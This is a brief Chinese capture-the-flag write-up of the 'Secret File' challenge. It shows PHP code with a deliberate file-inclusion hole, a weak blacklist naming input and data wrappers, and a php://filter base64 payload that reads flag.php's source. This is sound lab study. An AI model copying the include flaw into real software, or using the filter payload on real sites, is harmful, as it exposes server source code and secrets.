Secret File

打开之后的界面是

审查元素 之后有个跳转页面 直接跳转 然后

真狗 继续跳转 结果没看明白

尝试bp抓包试一下
发现 有东西

看到代码 进行分析

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

这里边有include 尝试伪协议 找到flag.php

secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

最后base64解码得到flag